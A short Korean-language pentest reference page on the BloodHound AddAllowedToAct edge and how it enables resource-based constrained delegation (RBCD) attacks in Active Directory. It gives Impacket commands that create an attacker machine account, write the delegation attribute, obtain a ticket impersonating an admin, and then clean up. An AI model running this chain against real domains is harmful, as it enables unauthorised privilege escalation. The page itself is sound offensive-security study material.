# AddAllowedToAct

* 대상의 `msDS-AllowedToActOnBehalfOfOtherIdentity` 특성을 수정할 수 있는 권한. 이를 통해 RBCD 공격을 진행할 수 있게 된다.
* 블러드하운드 Edge

<figure><img src="https://1805673931-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtMFEdQUk1veqYea72hvC%2Fuploads%2Fgit-blob-65f80667cbd7ee41ae287f62596be18fc4688dbd%2Fmsds-AllowedToActOnBehalfOfOtherIdentity.png?alt=media" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1805673931-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtMFEdQUk1veqYea72hvC%2Fuploads%2Fgit-blob-4b0287bdd24dc96014a4e70d9e739a46f4d1d40d%2Fbh-addallowedtoact.png?alt=media" alt=""><figcaption></figcaption></figure>

## 악용 - 컴퓨터

공격자의 유저가 컴퓨터를 대상으로 AddAllowedToAct 권한을 가지고 있다면, 대상 컴퓨터의 `msDS-AllowedToActOnBehalfOfOtherIdentity` 를 변경해 RBCD 공격을 진행한다.

```
addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password

rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'

getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'
```

## 유의점

* 대상의 `msDS-AllowedToActOnBehalfOfOtherIdentity` 특성을 수정하기 때문에 공격자 머신 계정을 해당 특성에서 지워 해당 특성을 원래 값으로 되돌려놓는다.

```
rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'remove' 'domain/user:password'
```
